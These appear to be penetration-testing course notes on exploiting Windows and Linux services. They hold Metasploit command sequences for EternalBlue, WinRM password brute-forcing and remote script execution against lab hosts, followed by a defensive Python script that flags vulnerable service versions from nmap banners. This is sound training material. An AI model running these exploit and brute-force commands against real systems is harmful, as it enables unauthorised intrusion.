# Exploitation

## Windows Exploitation <a href="#windows-exploitation" id="windows-exploitation"></a>

### HFS (HTTP File Server) <a href="#hfs-http-file-server" id="hfs-http-file-server"></a>

An **HFS** (HTTP File Server) is a file- and document-sharing web server.

* Rejetto HFS - free open source HTTP file server

> 🔬 [HFS - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/hfs-msf-exp)​

### SMB - MS17-010 EternalBlue <a href="#smb-ms17-010-eternalblue" id="smb-ms17-010-eternalblue"></a>

* ​[CVE-2017-0144](https://nvd.nist.gov/vuln/detail/CVE-2017-0144)​
* ​[EternalBlue VA](https://blog.syselement.com/ine/courses/ejpt/assessment-methodologies/4-va#eternalblue)​
  * **EternalBlue** takes advantage of a Windows SMBv1 protocol vulnerability
  * Patch was released in March 2017

> 🔬 Check the [Lab 2 - Eternal Blue here](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/windows-attacks/smb-psexec)​

* Some useful MSF commands from my Home Lab (`Kali VM + Win 2008_R2 Server`)

```
service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.168.31.131
setg RHOST 192.168.31.131
workspace -a EternalBlue

db_nmap -sS -sV -O 192.168.31.131
search type:auxiliary EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
options
run

search type:exploit EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
options
run
```

### WinRM <a href="#winrm" id="winrm"></a>

* Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
* Default WinRM HTTP port is **`5985`** and HTTPS **`5986`**

> 🔬 [WinRM Attack lab](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/windows-attacks/winrm)​

```
service postgresql start && msfconsole -q
db_status
setg RHOSTS 10.2.27.173
setg RHOST 10.2.27.173
workspace -a WinRM

db_nmap -sS -sV -O -p- 10.2.27.173
# Port 5985 is set up for WinRM
search type:auxiliary winrm
use auxiliary/scanner/winrm/winrm_auth_methods
options
run

# Brute force WinRM login
search winrm_login
use auxiliary/scanner/winrm/winrm_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run

search winrm_cmd
use auxiliary/scanner/winrm/winrm_cmd
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
run
```

![](https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-0bc3dc4945d45488dc092b94ee70750d1eb5b2e2%2Fimage-20230416114857268.png?alt=media)

```
search winrm_script
use exploit/windows/winrm/winrm_script_exec
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
```

### Apache Tomcat <a href="#apache-tomcat" id="apache-tomcat"></a>

[**`Apache Tomcat`**](https://tomcat.apache.org/) is a free open source Java servlet web server, *built to host dynamic websites and web apps developed in **Java***.

* Tomcat default TCP port is **`8080`**
* The Apache HTTP Server, by contrast, hosts HTML/PHP web apps
* Apache Tomcat < **`v.8.5.23`** is vulnerable to a JSP Upload Bypass / RCE

> 🔬 [Tomcat - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/tomcat-msf-exp)​

## Linux Exploitation <a href="#linux-exploitation" id="linux-exploitation"></a>

### FTP <a href="#ftp-1" id="ftp-1"></a>

[**`vsftpd`**](https://security.appspot.com/vsftpd.html) is a Unix FTP server.

* vsftpd **`v.2.3.4`** contains a command execution vulnerability

> 🔬 [FTP - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/ftpd-msf-exp)​

### SAMBA <a href="#samba" id="samba"></a>

**`Samba`** is the Linux implementation of SMB.

* Samba **`v.3.5.0`** is vulnerable to an RCE vulnerability

> 🔬 [Samba - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/samba-msf-exp)​

### SSH <a href="#ssh-1" id="ssh-1"></a>

**`libssh`** is a C library that implements the SSHv2 protocol.

* **`SSH`** default TCP port is **`22`**
* libssh **`v.0.6.0 - 0.8.0`** is vulnerable to an authentication bypass vulnerability

> 🔬 [SSH - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/ssh-msf-exp)​

### SMTP <a href="#smtp-1" id="smtp-1"></a>

[**`Haraka`**](https://haraka.github.io/) is an open source, high-performance SMTP server written in `Node.js`.

* **`SMTP`** default TCP port is **`25`**
  * other TCP ports are **`465`** and **`587`**
* Haraka prior to **`v.2.8.9`** is vulnerable to command injection

> 🔬 [SMTP - MSF Exploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/smtp-msf-exp)​
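The Linux and Tomcat sections above all reduce to the same defensive question: does the version a service advertises fall inside the vulnerable range the notes list? The script below is an added example (not part of the original notes or of Metasploit) that triages `nmap -sV`-style service lines against exactly those ranges (Tomcat < 8.5.23, vsftpd 2.3.4, Samba 3.5.0, libssh 0.6.0 - 0.8.0 treated as inclusive, Haraka < 2.8.9) so that an inventory can be checked for patch status. The banner lines are constructed, not real scan output; the version comparison is numeric, which matters because a plain string compare would wrongly rank Tomcat `8.5.9` above `8.5.23`.

```python
import re

# Vulnerable version rules as stated on this page (constructed mapping, added example):
#   ("lt", v)          -> every version strictly below v
#   ("exact", v)       -> exactly v
#   ("range", lo, hi)  -> lo <= version <= hi (page writes "0.6.0 - 0.8.0"; inclusive assumed)
RULES = {
    "tomcat": ("lt", "8.5.23"),             # JSP upload bypass / RCE below 8.5.23
    "vsftpd": ("exact", "2.3.4"),           # release with command execution
    "samba": ("exact", "3.5.0"),            # RCE in 3.5.0
    "libssh": ("range", "0.6.0", "0.8.0"),  # authentication bypass
    "haraka": ("lt", "2.8.9"),              # command injection prior to 2.8.9
}

# Product name followed (lazily) by the first dotted version number on the line.
PRODUCT_RE = re.compile(r"(?i)\b(tomcat|vsftpd|samba|libssh|haraka)\b.*?(\d+(?:\.\d+)*)")
# "<port>/tcp open <service> <banner>" as printed by nmap -sV.
BANNER_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+(.*)$")


def parse_version(text):
    """'8.5.9' -> (8, 5, 9); tuples compare numerically, never as strings."""
    return tuple(int(p) for p in text.split("."))


def cmp_versions(a, b):
    """Return -1, 0 or 1 for dotted-version tuples, padding the shorter with zeros."""
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)


def is_vulnerable(product, version):
    """Apply the page's rule for `product` to the observed `version` string."""
    rule = RULES[product]
    v = parse_version(version)
    if rule[0] == "lt":
        return cmp_versions(v, parse_version(rule[1])) < 0
    if rule[0] == "exact":
        return cmp_versions(v, parse_version(rule[1])) == 0
    lo, hi = parse_version(rule[1]), parse_version(rule[2])
    return cmp_versions(v, lo) >= 0 and cmp_versions(v, hi) <= 0


def triage(banner_lines):
    """Return (port, product, version, vulnerable) for each recognised service line."""
    findings = []
    for line in banner_lines:
        m = BANNER_RE.match(line.strip())
        if not m:
            continue  # not an open-port service line; ignore
        port, rest = int(m.group(1)), m.group(2)
        p = PRODUCT_RE.search(rest)
        if not p:
            continue  # a service this page has no rule for
        product, version = p.group(1).lower(), p.group(2)
        findings.append((port, product, version, is_vulnerable(product, version)))
    return findings


# Constructed nmap -sV style output for a hypothetical host (not real scan data).
SAMPLE_BANNERS = [
    "21/tcp   open  ftp          vsftpd 2.3.4",
    "22/tcp   open  ssh          libssh 0.7.3 (protocol 2.0)",
    "25/tcp   open  smtp         Haraka smtpd 2.8.9",
    "445/tcp  open  netbios-ssn  Samba smbd 3.5.0",
    "8080/tcp open  http         Apache Tomcat 8.5.9",
    "8081/tcp open  http         Apache Tomcat 8.5.23",
]

if __name__ == "__main__":
    for port, product, version, vuln in triage(SAMPLE_BANNERS):
        print(f"{'VULNERABLE' if vuln else 'ok':<10} {port:>5}/tcp {product} {version}")
```

Run it as-is to see the constructed host flagged on vsftpd, libssh, Samba and the Tomcat 8.5.9 instance, while Haraka 2.8.9 and Tomcat 8.5.23 pass; feed it real `nmap -sV` output by replacing `SAMPLE_BANNERS` with the lines of the scan. Banner versions are self-reported and some distributions backport fixes without changing the version string, so treat a hit as a prompt to confirm the installed package, not as proof of exposure.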
